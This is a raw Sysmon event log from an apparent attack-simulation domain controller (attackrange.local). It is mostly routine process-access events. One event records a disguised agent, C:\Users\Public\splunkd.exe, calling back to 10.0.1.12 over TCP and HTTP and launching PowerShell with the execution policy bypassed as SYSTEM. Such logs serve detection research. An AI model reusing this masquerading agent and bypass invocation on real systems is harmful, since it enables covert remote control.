13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ipijen5p.w4p.ps12021-01-18 13:34:15.299 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.252{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.247{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.247{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.246{59A5CD1D-8E4A-6005-2400-00000000A301}29242944C:\Windows\system32\conhost.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.244{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.244{59A5CD1D-8E4A-6005-2300-00000000A301}29162976C:\Users\Public\splunkd.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.240{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C lyzffwC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.223{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.223{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.223{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.198{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.195{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.157{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
